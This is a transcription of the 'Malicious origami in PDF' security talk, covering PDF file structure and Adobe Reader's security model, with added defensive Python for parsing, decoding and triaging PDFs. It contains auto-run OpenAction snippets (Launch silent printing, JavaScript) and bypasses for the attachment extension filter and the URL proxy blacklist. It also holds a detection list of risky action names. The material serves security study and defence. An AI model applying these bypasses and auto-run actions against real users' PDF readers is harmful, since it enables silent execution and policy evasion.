Malicious Origami in PDF: Frédéric Raynal, Guillaume Delugré

This document is a presentation on malicious origami in PDF files. It discusses the structure and security of PDF files. The presentation will cover the basic structure of PDF files, including that they are made up of objects, and how those objects are organized and related within the file. It will also discuss how to understand and abuse the PDF language and security model to enable attacks against PDF readers. The goal is to understand how to subvert the design of PDF to enable long-lasting attacks that are difficult to patch compared to typical vulnerability exploitation.


Outline: PDF 101 / The PDF way of security / Thinking malicious PDF / Darth Origami: dark side of PDF / Last words

Malicious origami in PDF

Frédéric Raynal
Sogeti-Cap Gemini, MISC magazine
fred(at)security-labs.org, frederic.raynal(at)sogeti.com

Guillaume Delugré
Sogeti-Cap Gemini
guillaume(at)security-labs.org, guillaume.delugre(at)sogeti.com

F. Raynal & G. Delugré (Sogeti/ESEC), Malicious origami in PDF, 1/116


PDF

MS Office documents are regarded as lethal:
- Many arbitrary code execution flaws, macro-viruses, ...

PDF files are much more reliable and secure!!!
- No macro
- Documents are static, like images

Feeling secure with PDF?


Origami

Definition (Wikipedia): from oru, meaning folding, and kami, meaning paper. Ancient Japanese art of paper folding. The goal is to create a representation of an object using geometric folds and crease patterns, preferably without gluing or cutting the paper, and using only one piece of paper. Origami only uses a small number of different folds, but they can be combined in a variety of ways to make intricate designs.


About this talk

The philosophy of malicious origami in PDF:
- Understand the PDF language to (ab)use it
- Understand the security model enforced by PDF readers
- Use PDF against PDF

Con: longer to do than finding a 0-day in most PDF readers
- Quick to find, quick to patch

Pro: attacks based on design flaws are the most efficient
- Long to find, long (if not impossible) to patch


Section 1, PDF 101: Structure of a PDF file / Thinking PDF / Deep inside PDF: objects

Roadmap

1. PDF 101
   - Structure of a PDF file
   - Thinking PDF
   - Deep inside PDF: objects
2. The PDF way of security
3. Thinking malicious PDF
4. Darth Origami: dark side of PDF
5. Last words


A brief history of PDF (in a single slide)

1991  PDF 1.0: first release
1994  PDF 1.1: links, encryption, comments
1996  PDF 1.2: forms, audio/video, annotations
1999  PDF 1.3: JavaScript, attachments, signatures
2001  PDF 1.4: transparency, encryption enhancement
2003  PDF 1.5: layers
2005  PDF 1.6: 3D engine
2007  PDF 1.7: Flash integration, 3D enhancement


Textual overview: what is PDF?

PDF is a file format
- Documents are described as a collection of objects
- These objects are stored in a file
- This file is read by a renderer in order to display the data

PDF is a descriptive language
- Interaction between objects
- Interaction with the renderer (password protection, printing, ...)
- No control statement (if, while, ...)

What you see is not what you get



Graphical overview

[Figure: file layout] Header, then the objects (Object, Object, ...), then the Cross Ref. table, then the Trailer.

PDF header

Example: %PDF-1.1

- Keyword %PDF
- PDF version (from 1.0 to 1.7)
- Optional binary sequence: 25 e2 e3 cf d3
  - Google it and own the Internet

PDF objects

1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj

42 0 obj
<< /Name /F1 /BaseFont /Helvetica /Type /Font >>
endobj

PDF cross references (1/2)

1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj

xref
0 6
0000000000 65535 f
0000000010 00000 n
0000000228 00000 n
0000000296 00000 n
0000000449 00000 n
0000002437 00000 n


PDF cross references (2/2)

xref                      <- section start
0 6                       <- first object, number of objects
0000000000 65535 f        <- free object
0000000010 00000 n        <- objects in use: offset in file, object generation, n
0000000228 00000 n
0000000296 00000 n
0000000449 00000 n
0000002437 00000 n

Object in use: <offset> <generation> n
- <offset>: bytes from the beginning of the file to the object's definition

Free object: 0000000000 <number> f
- <number>: number of the next free object

PDF trailer (1/2)

trailer
<< /Size 6 /Root 1 0 R >>
startxref
2991
%%EOF


PDF trailer (2/2)

trailer                   <- section start
<< /Size 6                <- number of elements in the xref table
   /Root 1 0 R            <- root object (Catalog)
   /Author Paul >>        <- optional information
startxref
2991                      <- xref location
%%EOF

The trailer provides all the information needed to read the PDF file; the Catalog is the root object describing the content of the file.
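To make the header / body / xref / trailer layout of the previous slides concrete, here is an added Python example (not code from the talk or from the authors' Origami tool). It serializes the six objects of the "Physical view" slide, computes the cross-reference offsets while writing, and then reads the file back the way a renderer does: jump to startxref, walk the 20-byte xref entries, read the trailer, and insist that each offset really lands on "N G obj". The object set, the stream content and the mismatched-offset check are assumptions of this example.

```python
import re

# Constructed sample: the six objects of the "Physical view" slide, serialized
# in order. The stream's /Length is computed from the data it really carries.
CONTENT = b"BT 1 Tr /F1 30 Tf 350 750 Td (foobar) Tj ET"
OBJECTS = {
    1: b"<< /Type /Catalog /Pages 2 0 R >>",
    2: b"<< /Count 2 /Kids [3 0 R 6 0 R] /Type /Pages >>",
    3: b"<< /Resources << /Font << /F1 5 0 R >> >> /MediaBox [0 0 795 842] "
       b"/Parent 2 0 R /Contents 4 0 R /Type /Page >>",
    4: b"<< /Length %d >>\nstream\n" % len(CONTENT) + CONTENT + b"\nendstream",
    5: b"<< /Name /F1 /BaseFont /Helvetica /Type /Font >>",
    6: b"<< /Resources << /Font << /F1 5 0 R >> >> /MediaBox [0 0 795 842] "
       b"/Parent 2 0 R /Contents 4 0 R /Type /Page >>",
}
HEADER = b"%PDF-1.1\n%\xe2\xe3\xcf\xd3\n"   # %PDF keyword, version, binary marker bytes


def build_pdf(objects, root=1):
    """Write header, body, xref table and trailer; objects must be numbered 1..N."""
    out = bytearray(HEADER)
    offsets = {}
    for num in sorted(objects):
        offsets[num] = len(out)                      # byte offset of "num 0 obj"
        out += b"%d 0 obj\n%s\nendobj\n" % (num, objects[num])
    startxref = len(out)
    size = max(objects) + 1                          # /Size is highest number + 1
    out += b"xref\n0 %d\n" % size
    out += b"0000000000 65535 f \n"                  # object 0 heads the free list
    for num in range(1, size):
        out += b"%010d 00000 n \n" % offsets[num]    # every entry is exactly 20 bytes
    out += b"trailer\n<< /Size %d /Root %d 0 R >>\n" % (size, root)
    out += b"startxref\n%d\n%%%%EOF\n" % startxref   # %%%% formats to the literal %%EOF marker
    return bytes(out)


def parse_xref(pdf):
    """Read the file the way a renderer does: find startxref at the end, jump
    to the xref table, read its entries, then the trailer that follows."""
    m = re.search(rb"startxref\s+(\d+)\s+%%EOF", pdf[-64:])
    if not m:
        raise ValueError("no startxref / %%EOF at end of file")
    startxref = int(m.group(1))
    m = re.match(rb"xref\s+(\d+)\s+(\d+)\s+", pdf[startxref:])
    if not m:
        raise ValueError("startxref does not point at an xref table")
    first, count = int(m.group(1)), int(m.group(2))
    pos = startxref + m.end()
    entries = {}
    for i in range(count):
        line = pdf[pos:pos + 20]                     # "oooooooooo ggggg n \n"
        entries[first + i] = (int(line[:10]), int(line[11:16]), line[17:18].decode())
        pos += 20
    t = re.match(rb"trailer\s*(<<.*?>>)", pdf[pos:], re.S)
    if not t:
        raise ValueError("no trailer after the xref table")
    return entries, t.group(1).decode()


def load_object(pdf, entries, num):
    """Seek to the xref offset and insist that it lands on "num gen obj"."""
    offset, gen, kind = entries[num]
    if kind != "n":
        raise ValueError("object %d is free" % num)
    head = b"%d %d obj" % (num, gen)
    if not pdf.startswith(head, offset):
        raise ValueError("xref offset of object %d does not point at its definition" % num)
    end = pdf.index(b"endobj", offset)
    return pdf[offset + len(head):end].strip()


if __name__ == "__main__":
    pdf = build_pdf(OBJECTS)
    entries, trailer = parse_xref(pdf)
    for num in sorted(entries):
        print(num, entries[num])
    print(trailer)
    print(load_object(pdf, entries, 1))
```

A renderer that silently falls back to scanning the file for "obj" keywords when an offset is wrong will load objects the xref table never pointed to; comparing the xref view with a linear scan of the file is a cheap consistency check when triaging a suspicious document.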


Understanding PDF

Based on 4 parts:
- Objects: basic elements contained in the document
- File structure: how objects are stored in a file
  - Header, body, xref, trailer
  - Encryption, signature, ...
- Document structure: how to use the objects to display the content of a file
  - Page, chapter, annotation, fonts, ...
- Content streams: sequence of instructions describing the appearance of a page or other graphical entity

Everything is described as an object


Physical view

1 0 obj << /Type /Catalog /Pages 2 0 R >>
2 0 obj << /Count 2 /Kids [3 0 R 6 0 R] /Type /Pages >>
3 0 obj << /Resources << /Font << /F1 5 0 R >> >> /MediaBox [0 0 795 842] /Parent 2 0 R /Contents 4 0 R /Type /Page >>
4 0 obj << /Length 53 >> stream BT 1 Tr /F1 30 Tf 350 750 Td (foobar) Tj ET endstream
5 0 obj << /Name /F1 /BaseFont /Helvetica /Type /Font >>
6 0 obj << /Resources << /Font << /F1 5 0 R >> >> /MediaBox [0 0 795 842] /Parent 2 0 R /Contents 4 0 R /Type /Page >>


Logical view
1 0 obj << /Type /Catalog /Pages 2 0 R >>

2 0 obj << /Count 2 /Kids [3 0 R 6 0 R] /Type /Pages >>

3 0 obj << /Resources << /Font << /F1 5 0 R >> >> /MediaBox [0 0 795 842] /Parent 2 0 R /Contents 4 0 R /Type /Page >>

6 0 obj << /Resources << /Font << /F1 5 0 R >> >> /MediaBox [0 0 795 842] /Parent 2 0 R /Contents 4 0 R /Type /Page >>

4 0 obj << /Length 53 >> stream BT 1 Tr /F1 30 Tf 350 750 Td (foobar) Tj ET endstream

5 0 obj << /Name /F1 /BaseFont /Helvetica /Type /Font >>


Object definition

1 0 obj                              <- reference number, generation number
<< /Type /Catalog /Pages 2 0 R >>    <- keywords specific to each type of object; "2 0 R" is a reference to another object
endobj                               <- object delimiter

- Always starts with a reference number, then a generation number
- Definition of the object surrounded by obj << ... >> endobj
- Keywords inside the object depend on its type
- Keywords can use references to other objects
- The list of objects is often referred to as the body

Basic types

- Null object
- Integer, real: straightforward
- Boolean: true, false
- String: multiple encodings available
  (This is a string in PDF)
- Name: used as a reference to another object instead of its number
  /SomethingElse
- Array: mono-dimensional sequence of objects/references
  [ (foo) 42 0 R 3.14 null ]
- Dictionary: (key, value) pairs
  << k0 v0 k1 v1 ... kn vn >>
  Most objects are dictionaries
- Stream: association of a dictionary and raw data to be processed
  4 0 obj << /Length 53 >> stream BT 1 Tr /F1 30 Tf 350 750 Td (foobar) Tj ET endstream endobj
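The basic types above form a small grammar, and the easiest way to see how they combine is to parse them. The following Python is an added example written for this page (not code from the talk or from the authors' Origami tool): it tokenizes one PDF object, folds "num gen R" into a reference, handles nested parentheses and escapes in literal strings, #xx escapes in names and odd-length hex strings, and rejects unbalanced or malformed input instead of guessing. The Name and Ref types and the PDFSyntaxError class are this example's own choices; streams (dictionary followed by stream ... endstream) are outside its scope.

```python
import re
from collections import namedtuple

Name = namedtuple("Name", "value")   # /Foo   (this example's own type)
Ref = namedtuple("Ref", "num gen")   # 42 0 R (this example's own type)

class PDFSyntaxError(ValueError):
    pass

DELIM = rb"\x00\t\n\x0c\r ()<>\[\]{}/%"                 # whitespace + delimiter characters
TOKEN = re.compile(
    rb"(?P<ws>[\x00\t\n\x0c\r ]+|%[^\r\n]*)"             # whitespace and % comments
    rb"|(?P<dopen><<)|(?P<dclose>>>)|(?P<aopen>\[)|(?P<aclose>\])"
    rb"|(?P<str>\()"                                     # literal string: body read by hand
    rb"|(?P<hex><[0-9A-Fa-f\s]*>)"
    rb"|(?P<name>/[^" + DELIM + rb"]*)"
    rb"|(?P<num>[+-]?(?:\d+\.?\d*|\.\d+))"
    rb"|(?P<kw>[A-Za-z]+)")
ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\x0c",
           b"(": b"(", b")": b")", b"\\": b"\\"}

def _read_literal_string(data, pos):
    """Body of a (...) string, pos just past the '('. Parentheses nest; backslash
    escapes, \\ddd octal codes and backslash-newline continuations are honoured."""
    depth, out = 1, bytearray()
    while pos < len(data):
        c = data[pos:pos + 1]
        if c == b"\\":
            esc, m = data[pos + 1:pos + 2], re.match(rb"[0-7]{1,3}", data[pos + 1:pos + 4])
            if m:
                out.append(int(m.group(), 8) & 0xFF)
                pos += 1 + len(m.group())
            elif esc in ESCAPES:
                out += ESCAPES[esc]
                pos += 2
            else:                        # continuation or unknown escape: nothing is emitted
                pos += 3 if data[pos + 1:pos + 3] == b"\r\n" else (2 if esc in (b"\n", b"\r") else 1)
            continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out), pos + 1
        out += c
        pos += 1
    raise PDFSyntaxError("unterminated literal string")

def _tokens(data):
    pos = 0
    while pos < len(data):
        m = TOKEN.match(data, pos)
        if not m:
            raise PDFSyntaxError("unexpected byte %r at offset %d" % (data[pos:pos + 1], pos))
        if m.lastgroup == "str":
            text, pos = _read_literal_string(data, m.end())
            yield "str", text
        else:
            pos = m.end()
            if m.lastgroup != "ws":
                yield m.lastgroup, m.group()

def _hex(tok):
    digits = re.sub(rb"\s", b"", tok[1:-1]).decode()
    return bytes.fromhex(digits + "0" if len(digits) % 2 else digits)   # odd length: pad with 0

def parse(data):
    """Parse exactly one object: scalar, array or dictionary, nested to any depth."""
    stack = [("top", [])]                    # (container kind, items collected so far)
    for kind, tok in _tokens(data):
        top = stack[-1][1]
        if kind in ("aopen", "dopen"):
            stack.append(("array" if kind == "aopen" else "dict", []))
        elif kind in ("aclose", "dclose"):
            want = "array" if kind == "aclose" else "dict"
            if stack[-1][0] != want:
                raise PDFSyntaxError("unbalanced %r" % tok)
            items = stack.pop()[1]
            if want == "array":
                stack[-1][1].append(items)
            elif len(items) % 2 or not all(isinstance(k, Name) for k in items[::2]):
                raise PDFSyntaxError("dictionary needs /Name value pairs")
            else:
                stack[-1][1].append({items[i].value: items[i + 1] for i in range(0, len(items), 2)})
        elif kind == "kw" and tok == b"R":   # "num gen R" folds into a reference
            if len(top) < 2 or type(top[-1]) is not int or type(top[-2]) is not int:
                raise PDFSyntaxError("R must follow two integers")
            gen, num = top.pop(), top.pop()
            top.append(Ref(num, gen))
        elif kind == "kw":
            if tok not in (b"true", b"false", b"null"):
                raise PDFSyntaxError("unexpected keyword %r" % tok)
            top.append({b"true": True, b"false": False, b"null": None}[tok])
        elif kind == "name":                 # resolve #xx escapes so /A#20B is the name "A B"
            raw = re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), tok[1:])
            top.append(Name(raw.decode("latin-1")))
        elif kind == "num":
            top.append(float(tok.decode()) if b"." in tok else int(tok))
        else:                                # "str" or "hex"
            top.append(tok if kind == "str" else _hex(tok))
    if len(stack) != 1:
        raise PDFSyntaxError("unclosed array or dictionary")
    if len(stack[0][1]) != 1:
        raise PDFSyntaxError("expected exactly one object, found %d" % len(stack[0][1]))
    return stack[0][1][0]
```

Call parse() on the bytes of one object, for instance parse(b"<< /Type /Catalog /Pages 2 0 R >>") returns a dict whose "Pages" value is Ref(2, 0). Every "unexpected" branch raises rather than skipping ahead; a parser that tries to recover from garbage is exactly what gives a malformed file a second, renderer-specific interpretation.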


Focus on stream

40 0 obj
<< /Subtype /Image                                           <- type
   /ColorSpace /DeviceRGB /Width 103 /Height 104 /BitsPerComponent 8
   /Filter /FlateDecode                                      <- transformation filter
   /DecodeParms << /Predictor 15 /Columns 103 /Colors 3 >>  <- filter parameters
   /Length 3259 >>
stream
...                                                          <- raw data to be filtered
endstream
endobj

- /Subtype: kind of stream
- /Filter: transformation to apply to the data
  - 2 main categories: ASCII, decompression
  - Can be cascaded: [ /ASCII85Decode /LZWDecode ]
- /DecodeParms: optional parameters depending on the filter
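The filter cascade and /DecodeParms are easiest to understand by running them. This added Python example (not code from the talk or from the authors' Origami tool) decodes a stream filtered with [/ASCII85Decode /FlateDecode] and then undoes the PNG predictor that a /DecodeParms entry such as << /Predictor 15 /Columns ... /Colors 3 >> describes. It also caps the inflated size, because a few hundred compressed bytes can legally expand to gigabytes and a reader that inflates blindly is an easy denial-of-service target. LZWDecode and the TIFF predictor are deliberately left out; the 2x2 RGB sample image and the encoder helper that builds the filtered stream are constructed for this example.

```python
import base64
import zlib

MAX_INFLATED = 64 * 1024 * 1024   # cap on inflated size: a few KB of Flate can expand to GB


def ascii85_decode(data, limit=None):
    """ASCII85Decode: decode everything before the '~>' end-of-data marker."""
    body = data.split(b"~>", 1)[0]
    return base64.a85decode(body, ignorechars=b" \t\n\r\x0c\x00")


def flate_decode(data, limit=MAX_INFLATED):
    """FlateDecode with an output cap; truncated or oversized streams are refused."""
    d = zlib.decompressobj()
    out = d.decompress(data, limit)
    if not d.eof:
        raise ValueError("Flate stream truncated or inflating past %d bytes" % limit)
    return out


def _paeth(a, b, c):
    p = a + b - c
    pa, pb, pc = abs(p - a), abs(p - b), abs(p - c)
    if pa <= pb and pa <= pc:
        return a
    return b if pb <= pc else c


def png_unpredict(data, colors=1, bpc=8, columns=1):
    """Undo PNG predictors (/Predictor >= 10): each row is a filter-type byte plus the row."""
    bpp = max(1, (colors * bpc + 7) // 8)           # bytes per pixel
    rowlen = (columns * colors * bpc + 7) // 8       # bytes per row, type byte excluded
    if len(data) % (rowlen + 1):
        raise ValueError("predictor data is not a whole number of rows")
    prev, out = bytearray(rowlen), bytearray()
    for start in range(0, len(data), rowlen + 1):
        ftype = data[start]
        row = bytearray(data[start + 1:start + 1 + rowlen])
        for i in range(rowlen):
            a = row[i - bpp] if i >= bpp else 0      # left, already reconstructed
            b = prev[i]                              # up
            c = prev[i - bpp] if i >= bpp else 0     # upper left
            if ftype == 1:
                row[i] = (row[i] + a) & 0xFF
            elif ftype == 2:
                row[i] = (row[i] + b) & 0xFF
            elif ftype == 3:
                row[i] = (row[i] + (a + b) // 2) & 0xFF
            elif ftype == 4:
                row[i] = (row[i] + _paeth(a, b, c)) & 0xFF
            elif ftype != 0:
                raise ValueError("unknown PNG filter type %d" % ftype)
        out += row
        prev = row
    return bytes(out)


FILTERS = {"ASCII85Decode": ascii85_decode, "FlateDecode": flate_decode}


def decode_stream(raw, filters, parms=None, limit=MAX_INFLATED):
    """Apply the /Filter entries in order; /DecodeParms runs parallel to /Filter."""
    filters = [filters] if isinstance(filters, str) else list(filters)
    parms = parms if isinstance(parms, list) else [parms] * len(filters)
    data = raw
    for name, p in zip(filters, parms):
        if name not in FILTERS:
            raise ValueError("unsupported filter %s" % name)
        data = FILTERS[name](data, limit)
        p = p or {}
        predictor = p.get("Predictor", 1)
        if predictor >= 10:
            data = png_unpredict(data, p.get("Colors", 1), p.get("BitsPerComponent", 8), p.get("Columns", 1))
        elif predictor != 1:
            raise ValueError("TIFF predictor (2) is not implemented in this example")
    return data


def make_sample(pixels, columns, colors):
    """Encoder side, constructed for this example: PNG 'Up' filter per row, then Flate, then ASCII85."""
    rowlen = columns * colors
    out, prev = bytearray(), bytes(rowlen)
    for s in range(0, len(pixels), rowlen):
        row = pixels[s:s + rowlen]
        out.append(2)                                # filter type 2 = Up
        out += bytes((row[i] - prev[i]) & 0xFF for i in range(rowlen))
        prev = row
    return base64.a85encode(zlib.compress(bytes(out))) + b"~>"


PIXELS = bytes(range(12))   # constructed 2x2 RGB image (columns=2, colors=3)
```

decode_stream(make_sample(PIXELS, 2, 3), ["ASCII85Decode", "FlateDecode"], [None, {"Predictor": 15, "Columns": 2, "Colors": 3}]) gives PIXELS back: the filters are applied in the order they are listed, the predictor is undone after the Flate step it belongs to, and the /DecodeParms entry for ASCII85Decode is null because that filter takes no parameters.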


Advanced objects

A very descriptive language:
- General: page tree nodes, pages, names, dates, text streams, functions, file specifications, ...
- Graphics: path construction operators, clipping, external objects (XObject), images, patterns, ...
- Text: spacing, text rendering, text positioning, fonts, ...
- Rendering: color device, gamma correction, halftones, ...
- Transparency: shape, opacity, color mask, alpha factor, ...
- Interactive: viewer preferences, annotations, actions, forms, digital signature, ...
- Multimedia: play/screen parameters, sounds, movies, 3D artwork, ...


Section 2, The PDF way of security: Enforced security / User configurable security / Signature and certification / Usage rights

Roadmap

1. PDF 101
2. The PDF way of security
   - Enforced security
   - User configurable security
   - Signature and certification
   - Usage rights
3. Thinking malicious PDF
4. Darth Origami: dark side of PDF
5. Last words

Security philosophy with PDF

They never learn...
- Some features are really dangerous...
  Ex.: starting external programs, JavaScript, automatic / invisible actions, ...
- But the guys know they are dangerous, so they restrict them...
  Blacklist approach: allow everything which is not explicitly forbidden

Which is the opposite of the most important security mantra:
Forbid everything which is not explicitly allowed!!!


Focus: Adobe Reader

Summary in a single slide
- Some features are restricted in the software
  - Restricted JavaScript interpreter
  - Blacklist for some file extensions, web sites, ...
- Security can be configured at user level:
  - Windows: key HKCU\Software\Adobe\Acrobat Reader
  - Windows: directory %APPDATA%\Adobe\Acrobat
  - Unix: directory ~/.adobe/Acrobat/
  - Mac OS X: directory ~/Library/Preferences/com.adobe.*
- Notion of trusted documents
  - Signature: digitally signed documents embedding the signer's certificate
  - Certification: documents signed by a trusted entity, enforcing modification prevention


Actions: when PDF becomes dynamic

List of actions:
- GoTo*: change the view to the specified destination
- Launch: start a command
- Thread: jump to a bead in an article
- URI: resolve and connect to a given URI
- Sound: play a sound
- Movie: play a movie
- Hide: manipulate annotations to hide/display them
- Named: predefined actions to move across a document
- Set-OCG-State: handle optional content
- Rendition: control the playing of multimedia content
- Transition: handle the drawing between actions
- Go-To-3D: identifies a 3D annotation and its view
- JavaScript: run a JS script


Actions

When PDF becomes dynamic: OpenAction & trigger events

Event                                 Action
Document or page is opened            Run a command or a JavaScript
Page is viewed                        Jump to a destination
Mouse enters/exits a zone             Play a sound/movie
Mouse button is pressed/released      Submit a form to a URL
...                                   ...

- Actions usually raise an alert box
- Most alerts can be disabled in the configuration
- Security is ensured most of the time through a warning pop-up


Action in practice: Launch (a.k.a. invisible printing)

(Almost) invisible printing: document leaking

/OpenAction << /S /Launch /Win << /O (print) /F (C:\\test.pdf) >> >>

- Adobe Reader 9 asks to start Adobe Reader 9 (!!!)
- If the user clicks Open, the document is silently printed, with no other message
- Launch is not subject to the extension filter

JavaScript

JavaScript for Adobe: a modified open source SpiderMonkey engine (a), defining two execution contexts
- Non-privileged context (default): scripts are limited to handling forms and document properties
- Privileged context: scripts are allowed to call more powerful (and sensitive) methods, such as HTTP requests

Two ways of executing JavaScript:
- Embedding the script in the PDF document
- Having a script in the user configuration folder
  - These scripts are executed each time a PDF document is opened
  - Located in <config folder>/JavaScripts/*.js
  - They run in a privileged context

(a) Adobe's site claims the changes will be made public, according to the Mozilla license... for 3 years now!!!


JavaScript in practice

Embedding a JavaScript:
/OpenAction << /S /JavaScript /JS (app.alert("run me automatically")) >>

JavaScript exceptions will not raise any alert if enclosed in a try/catch statement
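From the reader's side, the two /OpenAction examples on these slides are exactly what a first-pass triage tool should flag. This added Python example (not code from the talk, from the authors' Origami tool or from Adobe Reader) scans the raw syntax of a file for the action-related names discussed above, resolves the #xx name escapes defined by the PDF syntax so that the comparison is made on the canonical name, and reports when a trigger (OpenAction or AA) is paired with something executable. The list of names, the sample file and the context width are assumptions of this example; it only looks at uncompressed syntax, so objects packed into compressed object streams must be inflated before being scanned.

```python
import re

# Names whose presence turns a static document into one that does something.
RISKY = {
    "OpenAction":   "action run automatically when the document is opened",
    "AA":           "additional actions: triggers on page, annotation or field events",
    "Launch":       "starts an external program or opens a file",
    "JavaScript":   "JavaScript action",
    "JS":           "JavaScript code carried as a string or stream",
    "URI":          "resolves and connects to a URI",
    "SubmitForm":   "sends form data to a URL",
    "EmbeddedFile": "file attachment embedded in the document",
}
TRIGGERS = {"OpenAction", "AA"}
PAYLOADS = {"Launch", "JavaScript", "JS", "URI", "SubmitForm"}

NAME_RE = re.compile(rb"/([^\x00\t\n\x0c\r ()<>\[\]{}/%]+)")


def normalize_name(raw):
    """Resolve the #xx hex escapes the PDF name syntax allows (/A#20B is the name 'A B')."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), raw)


def scan_actions(pdf, context=60):
    """List (offset, name, reason, snippet) for every risky name in the raw bytes."""
    hits = []
    for m in NAME_RE.finditer(pdf):
        name = normalize_name(m.group(1)).decode("latin-1")
        if name in RISKY:
            snippet = pdf[m.start():m.start() + context].decode("latin-1").replace("\n", " ")
            hits.append((m.start(), name, RISKY[name], snippet))
    return hits


def auto_executing(hits):
    """True when a trigger (OpenAction/AA) and an executable payload are both present:
    the combination the slides describe, where the only barrier left is the warning pop-up."""
    names = {h[1] for h in hits}
    return bool(names & TRIGGERS) and bool(names & PAYLOADS)


# Constructed sample: the two OpenAction examples from the slides in one small file.
SAMPLE = (
    b"%PDF-1.1\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R "
    b"/OpenAction << /S /Launch /Win << /O (print) /F (C:\\\\test.pdf) >> >> >> endobj\n"
    b"7 0 obj << /S /JavaScript /JS (app.alert(\"run me automatically\")) >> endobj\n"
)
CLEAN = b"%PDF-1.1\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"

if __name__ == "__main__":
    for offset, name, reason, snippet in scan_actions(SAMPLE):
        print("%6d  /%-12s %-60s %s" % (offset, name, reason, snippet))
    print("auto-executing:", auto_executing(scan_actions(SAMPLE)))
```

The scan is a heuristic, not a parse: a slash inside a string literal also looks like a name, and a name split by a comment or hidden in a compressed object stream is not seen at all. It is cheap enough to run on every inbound attachment, and a hit on auto_executing() is a good reason to open the file only in a renderer with JavaScript and Launch disabled.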

Where the configuration resides

Most of the configuration is stored in user folders.

Folders and keys
- On Windows:
  - HKCU\Software\Adobe\Acrobat Reader
  - HKLM\SOFTWARE\Policies\Adobe\Acrobat Reader\9.0\FeatureLockDown
  - %APPDATA%\Adobe\Acrobat
- On Unix: ~/.adobe/Acrobat
- Mac OS X: ~/Library/Preferences/com.adobe.*

Some important files
- Main file: <folder>/Preferences/reader_prefs (on Unix)
- Start-up scripts: <folder>/JavaScripts/*.js
- Certificates: <folder>/Security/*.acrodata

Filtering attachments: the theory

Adobe Reader anti-virus
- The security policy for extracting attachments is based on file extension filtering
- A default non-writable blacklist prohibits various extensions: cmd, bat, js, vbs, exe, pif, com, ...
  - This blacklist is stored in HKLM or in the installation folder, hence not modifiable
  - PDF and FDF are whitelisted by default
- The user can define his own extension whitelist
  - Whitelisted extensions can then run without any warning, whatever the file really contains
  - The blacklist has precedence over the whitelist


Filtering attachments: the real life

Adobe Reader anti-virus: Reader prompts the user to open this attachment

Bypassing the attachment filter
- Adobe Reader 8: jar files are allowed by default
- Adobe Reader 9: bypass filtering by adding : or \ at the end of the filename (MS Windows)
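The trailing-character bypass on this slide and the blacklist described on the previous one are two sides of the same mistake: the filter compares the literal filename while the operating system opens something else. This added Python example (not code from the talk or from Adobe Reader) shows the check done the other way round: reduce the name to what will actually be opened (last path component, no NTFS stream suffix, no trailing separators, dots or spaces), then apply an allowlist only, denying anything without a recognized extension. The allowlist and the filenames in the test are constructed for the example.

```python
ALLOWED = {"pdf", "fdf", "txt", "png", "jpg"}   # constructed allowlist for this example


def normalized_name(filename):
    """Reduce an attachment name to the name the operating system will actually open."""
    name = filename.rstrip("\\/")                        # "evil.exe\" is still evil.exe
    name = name.replace("\\", "/").rsplit("/", 1)[-1]    # last path component only
    name = name.split(":", 1)[0]                         # NTFS stream syntax: "evil.exe:" / "evil.exe:x"
    return name.rstrip(". ").lower()                     # Windows drops trailing dots and spaces


def classify(filename):
    """Allowlist-only decision on the normalized name; no extension means deny."""
    name = normalized_name(filename)
    if "." not in name:
        return "deny"
    ext = name.rsplit(".", 1)[1]
    return "allow" if ext in ALLOWED else "deny"


if __name__ == "__main__":
    for f in ("report.pdf", "evil.exe", "evil.exe:", "evil.exe\\", "evil.exe.", "archive.jar", "noext"):
        print("%-12r -> %-10r %s" % (f, normalized_name(f), classify(f)))
```

With a blacklist the unknown case ("jar", a name with no extension, a spelling the filter never anticipated) is allowed through; with an allowlist on the normalized name it is denied, which is the "forbid everything which is not explicitly allowed" rule from the philosophy slide applied to one decision.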

Filtering Internet Access: the theory

Adobe Reader proxy
- Form submission or URL access may require Reader's approval
- Access checking is only based on the hostname
- The user can allow access to any site, forbid everything, or deal with it case by case with a pop-up
- The access list can be modified at user level through the registry or the user folder
  - Once a site is whitelisted, no pop-up will be raised during future connection attempts


Filtering Internet Access: the real life

Adobe Reader proxy: Reader prompts the user to allow the connection as this site has no access entry

Bypassing the blacklisting of the PDF proxy
- Filtering is based on pattern matching: find another representation!
- http://seclabs.org == http://88.191.33.37 == http://1488920869:80/
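Matching the hostname as a string, as the slide above describes, is defeated by any other spelling of the same address. This added Python example (not code from the talk or from Adobe Reader) canonicalizes the host before the lookup: the dotted-quad and single-integer forms of an IPv4 address (decimal, as on the slide, or hex) all collapse to one text form, names are lower-cased with the trailing dot removed, and the policy is deny-by-default with the block list consulted before the allow list, the ordering the "security mantra" slide calls for. The allow and block lists and the URLs in the test are constructed; a real deployment would also resolve names to addresses before comparing, since a name can point at a blocked address.

```python
import ipaddress
from urllib.parse import urlsplit


def canonical_host(url):
    """Reduce the host part of a URL to one canonical form before any list lookup.
    Returns ("ip", canonical address text) or ("name", lower-case hostname)."""
    host = urlsplit(url).hostname or ""          # urlsplit lower-cases and strips IPv6 brackets
    try:
        return "ip", str(ipaddress.ip_address(host))
    except ValueError:
        pass
    try:                                         # single-number forms: 1488920869 or 0x58bf2125
        n = int(host, 0)
        if 0 <= n < 2 ** 32:
            return "ip", str(ipaddress.IPv4Address(n))
    except ValueError:
        pass
    return "name", host.rstrip(".")


def decide(url, allow, block, schemes=("http", "https")):
    """Deny-by-default policy: scheme allowlist, then block list, then allow list, else ask."""
    scheme = urlsplit(url).scheme.lower()
    if scheme not in schemes:
        return "deny"
    _, host = canonical_host(url)
    if host in block:                            # a block entry wins over any allow entry
        return "deny"
    if host in allow:
        return "allow"
    return "ask"                                 # unknown host: prompt, never connect silently


if __name__ == "__main__":
    block, allow = {"88.191.33.37"}, {"seclabs.org"}
    for u in ("http://seclabs.org", "http://88.191.33.37", "http://1488920869:80/", "http://0x58bf2125/"):
        print("%-28s host=%-22s %s" % (u, canonical_host(u)[1], decide(u, allow, block)))
```

Note what the canonical form does and does not buy: the three spellings on the slide now hit the same block entry, but "seclabs.org" and "88.191.33.37" are still two different keys, so a list that mixes names and addresses must be resolved to addresses on both sides before the comparison means anything.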

